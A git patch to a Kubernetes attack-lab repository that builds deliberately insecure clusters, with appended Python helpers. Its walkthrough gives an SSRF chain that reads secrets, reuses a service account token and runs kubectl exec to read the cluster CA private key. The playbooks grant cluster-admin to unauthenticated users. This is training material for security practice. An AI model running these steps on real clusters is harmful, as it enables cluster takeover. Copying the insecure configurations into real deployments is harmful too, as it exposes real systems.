From 98bf904f0bfe98ee412422f154e25824cb82a510 Mon Sep 17 00:00:00 2001
From: Rory McCune
Date: Sat, 21 Sep 2019 20:41:12 +0100
Subject: [PATCH] Finish SSRF exercise and add cluster IP print to playbooks

---
 Scenario Setups/ssrf-to-insecure-port.md |  6 +++--
 .../ssrf-to-insecure-port.md             | 12 ++++++----
 ansible_tasks/print_cluster_ip.yml       |  4 ++++
 client-machine.retry                     |  1 -
 demo-cluster.yml                         |  3 ++-
 etcd-noauth.yml                          |  1 +
 insecure-port.yml                        |  1 +
 kubeadm_configs/localinsecureport.yml    | 23 +++++++++++++++++++
 manifests/ssrfdeployment.yml             |  1 +
 rwkubelet-noauth.yml                     |  2 +-
 ssh-to-cluster-master.yml                |  2 ++
 ssh-to-create-pods-easy.yml              |  4 +++-
 ssh-to-create-pods-hard.yml              |  4 +++-
 ssh-to-get-secrets.yml                   |  4 +++-
 ssrf-to-insecure-port.yml                |  4 +++-
 tiller-noauth.yml                        |  2 ++
 unauth-api-server.yml                    |  2 ++
 17 files changed, 63 insertions(+), 13 deletions(-)
 create mode 100644 ansible_tasks/print_cluster_ip.yml
 delete mode 100644 client-machine.retry
 create mode 100644 kubeadm_configs/localinsecureport.yml

diff --git a/Scenario Setups/ssrf-to-insecure-port.md b/Scenario Setups/ssrf-to-insecure-port.md
index 98e05d9..448d305 100644
--- a/Scenario Setups/ssrf-to-insecure-port.md
+++ b/Scenario Setups/ssrf-to-insecure-port.md
@@ -13,7 +13,9 @@ docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' ssh
 
 At this point, if you're running on a Linux host, you should be able to connect to the web application on the Docker network at
 
 ```
-http://[CLUSTERIP]:32001/
+http://127.0.0.1:32001/
 ```
-The username is `ssrftester` and the password is `ssrftester`
\ No newline at end of file
+The username is `ssrftester` and the password is `ssrftester`
+
+The insecure port is only available on 127.0.0.1, but the other cluster services (including the API server) should be available on the cluster IP
\ No newline at end of file
diff --git a/Scenario Walkthroughs/ssrf-to-insecure-port.md b/Scenario Walkthroughs/ssrf-to-insecure-port.md
index 45c1dcc..75e8f90 100644
--- a/Scenario Walkthroughs/ssrf-to-insecure-port.md
+++ b/Scenario Walkthroughs/ssrf-to-insecure-port.md
@@ -4,7 +4,11 @@ The application provides the facility to do GET and POST requests, so there's a
 
 One option would be
 
-1. Get a list of running pods using the GET SSRF endpoint
-   - http://[CLUSTERIP]:8080/api/v1/pods
-2. From that get the name of the kube-apiserver pod (it should be something like `kube-apiserver-ssrfinsecureport-control-plane`)
-3. Then execute our cat command for the ca.key file using the POST endpoint.
\ No newline at end of file
+1. Get a list of secrets using the GET SSRF endpoint
+   - http://127.0.0.1:8080/api/v1/secrets
+2. Get a secret that has privileges on the API server (e.g. clusterrole-aggregation-controller-token)
+3. Find the `token:` field and make a copy of it
+4. Base64 decode the token (one way to do this is https://gchq.github.io/CyberChef)
+5. Use the token to make requests to the exposed API server
+   1. `kubectl --insecure-skip-tls-verify --token=[TOKEN] -s https://[CLUSTERIP]:6443 get po -n kube-system`
+   2. `kubectl --insecure-skip-tls-verify --token=[TOKEN] -s https://[CLUSTERIP]:6443 -n kube-system exec [APISERVERPOD] cat /etc/kubernetes/pki/ca.key`
\ No newline at end of file
diff --git a/ansible_tasks/print_cluster_ip.yml b/ansible_tasks/print_cluster_ip.yml
new file mode 100644
index 0000000..2d30320
--- /dev/null
+++ b/ansible_tasks/print_cluster_ip.yml
@@ -0,0 +1,4 @@
+---
+ - name: Print the Cluster IP address
+   debug:
+     msg: "The Cluster IP address is {{ ansible_default_ipv4.address }} "
\ No newline at end of file
diff --git a/client-machine.retry b/client-machine.retry
deleted file mode 100644
index 2fbb50c..0000000
--- a/client-machine.retry
+++ /dev/null
@@ -1 +0,0 @@
-localhost
diff --git a/demo-cluster.yml b/demo-cluster.yml
index 0fdaefa..bb0a980 100644
--- a/demo-cluster.yml
+++ b/demo-cluster.yml
@@ -36,4 +36,5 @@
       fetch:
         src: /etc/kubernetes/admin.conf
         dest: /tmp/demo-kubernetes-admin.conf
-        flat: yes
\ No newline at end of file
+        flat: yes
+    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
\ No newline at end of file
diff --git a/etcd-noauth.yml b/etcd-noauth.yml
index 656dc08..61092c6 100644
--- a/etcd-noauth.yml
+++ b/etcd-noauth.yml
@@ -30,4 +30,5 @@
 
   tasks:
     - import_tasks: ./ansible_tasks/setup_kubeconfig.yml
 
+    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
\ No newline at end of file
diff --git a/insecure-port.yml b/insecure-port.yml
index b8d7aec..b19b980 100644
--- a/insecure-port.yml
+++ b/insecure-port.yml
@@ -30,4 +30,5 @@
 
   tasks:
     - import_tasks: ./ansible_tasks/setup_kubeconfig.yml
 
+    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
\ No newline at end of file
diff --git a/kubeadm_configs/localinsecureport.yml b/kubeadm_configs/localinsecureport.yml
new file mode 100644
index 0000000..84adb5e
--- /dev/null
+++ b/kubeadm_configs/localinsecureport.yml
@@ -0,0 +1,23 @@
+
+# kind cluster config that exposes the API server insecure port on localhost
+kind: Cluster
+apiVersion: kind.sigs.k8s.io/v1alpha3
+# patch the generated kubeadm config with some extra settings
+kubeadmConfigPatches:
+- |
+  apiVersion: kubeadm.k8s.io/v1beta2
+  kind: ClusterConfiguration
+  metadata:
+    name: config
+  apiServer:
+    extraArgs:
+      # Don't forget quotes on the values
+      insecure-bind-address: "127.0.0.1"
+      insecure-port: "8080"
+# a single control plane node
+nodes:
+# the control plane node config
+- role: control-plane
+  extraPortMappings:
+  - containerPort: 8080
+    hostPort: 8080
diff --git a/manifests/ssrfdeployment.yml b/manifests/ssrfdeployment.yml
index e3f0c59..52d840a 100644
--- a/manifests/ssrfdeployment.yml
+++ b/manifests/ssrfdeployment.yml
@@ -12,6 +12,7 @@ spec:
       labels:
         run: ssrf
     spec:
+      hostNetwork: true
       containers:
       - name: ssrf
        image: raesene/ssrftester
diff --git a/rwkubelet-noauth.yml b/rwkubelet-noauth.yml
index 5023ad1..bea128a 100644
--- a/rwkubelet-noauth.yml
+++ b/rwkubelet-noauth.yml
@@ -30,4 +30,4 @@
 
   tasks:
     - import_tasks: ./ansible_tasks/setup_kubeconfig.yml
-    
\ No newline at end of file
+    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
\ No newline at end of file
diff --git a/ssh-to-cluster-master.yml b/ssh-to-cluster-master.yml
index 0c06db2..97d989c 100644
--- a/ssh-to-cluster-master.yml
+++ b/ssh-to-cluster-master.yml
@@ -33,3 +33,5 @@
 
     - name: make the default service account cluster-admin
       command: kubectl --kubeconfig=/etc/kubernetes/admin.conf create clusterrolebinding serviceaccounts-cluster-admin --clusterrole=cluster-admin --group=system:serviceaccounts
+
+    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
\ No newline at end of file
diff --git a/ssh-to-create-pods-easy.yml b/ssh-to-create-pods-easy.yml
index ab87a24..e400523 100644
--- a/ssh-to-create-pods-easy.yml
+++ b/ssh-to-create-pods-easy.yml
@@ -40,4 +40,6 @@
       command: kubectl create -f /root/pod-manager.yml
 
     - name: Give the default service account rights to manage pods
-      command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-manager --group=system:serviceaccounts
\ No newline at end of file
+      command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-manager --group=system:serviceaccounts
+
+    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
\ No newline at end of file
diff --git a/ssh-to-create-pods-hard.yml b/ssh-to-create-pods-hard.yml
index 44381d4..8561a16 100644
--- a/ssh-to-create-pods-hard.yml
+++ b/ssh-to-create-pods-hard.yml
@@ -40,4 +40,6 @@
       command: kubectl create -f /root/pod-creator.yml
 
     - name: Give the default service account rights to manage pods
-      command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-creator --group=system:serviceaccounts
\ No newline at end of file
+      command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-creator --group=system:serviceaccounts
+
+    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
\ No newline at end of file
diff --git a/ssh-to-get-secrets.yml b/ssh-to-get-secrets.yml
index d735e58..0d851db 100644
--- a/ssh-to-get-secrets.yml
+++ b/ssh-to-get-secrets.yml
@@ -40,4 +40,6 @@
       command: kubectl create -f /root/secret-reader.yml
 
     - name: Give the default service account rights to manage pods
-      command: kubectl create clusterrolebinding serviceaccounts-secret-reader --clusterrole=secret-reader --group=system:serviceaccounts
\ No newline at end of file
+      command: kubectl create clusterrolebinding serviceaccounts-secret-reader --clusterrole=secret-reader --group=system:serviceaccounts
+
+    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
\ No newline at end of file
diff --git a/ssrf-to-insecure-port.yml b/ssrf-to-insecure-port.yml
index 8adc3fb..8f57a82 100644
--- a/ssrf-to-insecure-port.yml
+++ b/ssrf-to-insecure-port.yml
@@ -6,7 +6,7 @@
     cluster_name: ssrfinsecureport
     # This needs to be the cluster name with -control-plane added
     container_name: ssrfinsecureport-control-plane
-    cluster_config: insecureport.yml
+    cluster_config: localinsecureport.yml
 
   tasks:
     - name: Start a kind cluster
@@ -31,5 +31,7 @@
 
 
   tasks:
     - import_tasks: ./ansible_tasks/setup_kubeconfig.yml
     - import_tasks: ./ansible_tasks/setup_ssrf_pod.yml
+    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
+
\ No newline at end of file
diff --git a/tiller-noauth.yml b/tiller-noauth.yml
index a7b7373..6e38794 100644
--- a/tiller-noauth.yml
+++ b/tiller-noauth.yml
@@ -34,3 +34,5 @@
 
     - name: Expose Tiller via NodePort
       command: kubectl patch svc tiller-deploy -n kube-system --type='json' -p '[{"op":"replace","path":"/spec/type","value":"NodePort"}]'
+
+    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
\ No newline at end of file
diff --git a/unauth-api-server.yml b/unauth-api-server.yml
index fd986bc..17138d6 100644
--- a/unauth-api-server.yml
+++ b/unauth-api-server.yml
@@ -32,3 +32,5 @@
 
     - name: cluster-admin Unauthenticated
       command: kubectl create clusterrolebinding unauth-cluster-admin --clusterrole=cluster-admin --group=system:unauthenticated
+
+    - import_tasks: ./ansible_tasks/print_cluster_ip.yml
\ No newline at end of file
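
The walkthrough updated above ends by base64-decoding a service account token and replaying it against the API server on the cluster IP. A minimal Python sketch of steps 3 to 5 follows; it assumes the JSON returned by the `/api/v1/secrets` SSRF request has been saved to a local file, and the file name, cluster IP and API server pod name are illustrative placeholders rather than anything defined in this repository.

```python
#!/usr/bin/env python3
"""Sketch of walkthrough steps 3-5: pick a token, decode it, build kubectl commands.

Assumes the body returned by the GET SSRF request to /api/v1/secrets was saved
to secrets.json. CLUSTER_IP and APISERVER_POD are placeholders to replace with
the values from your own lab run.
"""
import base64
import json

CLUSTER_IP = "192.0.2.10"  # replace with the address printed by print_cluster_ip.yml
APISERVER_POD = "kube-apiserver-ssrfinsecureport-control-plane"

with open("secrets.json") as f:
    secrets = json.load(f)

# Steps 2/3: find a clusterrole-aggregation-controller token secret and copy its token field.
token_b64 = next(
    item["data"]["token"]
    for item in secrets["items"]
    if item["metadata"]["name"].startswith("clusterrole-aggregation-controller-token")
)

# Step 4: secret data is base64 encoded, so decode it locally instead of via CyberChef.
token = base64.b64decode(token_b64).decode()

# Step 5: reuse the token against the API server exposed on the cluster IP.
base_cmd = f"kubectl --insecure-skip-tls-verify --token={token} -s https://{CLUSTER_IP}:6443"
print(f"{base_cmd} get po -n kube-system")
print(f"{base_cmd} -n kube-system exec {APISERVER_POD} cat /etc/kubernetes/pki/ca.key")
```

Running it simply prints the two kubectl commands from step 5 with the decoded token substituted in.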
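
The setup note says the insecure port is only bound to 127.0.0.1, while the other cluster services, including the API server on 6443, should be reachable on the cluster IP that the playbooks now print. A small reachability probe can confirm that split from the lab host; again this is only a sketch, with a placeholder cluster IP to replace with the printed address, and the expectation for port 8080 comes from the note rather than from testing.

```python
#!/usr/bin/env python3
"""Probe the endpoints the docs mention: the web app on localhost, the API server
on the cluster IP, and the insecure port on the cluster IP (expected closed)."""
import socket

CLUSTER_IP = "192.0.2.10"  # placeholder: use the address printed by print_cluster_ip.yml

TARGETS = [
    ("ssrf web app", "127.0.0.1", 32001),
    ("kube-apiserver (TLS)", CLUSTER_IP, 6443),
    ("insecure port (should not be reachable here)", CLUSTER_IP, 8080),
]

for label, host, port in TARGETS:
    try:
        with socket.create_connection((host, port), timeout=3):
            print(f"{label}: {host}:{port} open")
    except OSError as exc:
        print(f"{label}: {host}:{port} closed ({exc})")
```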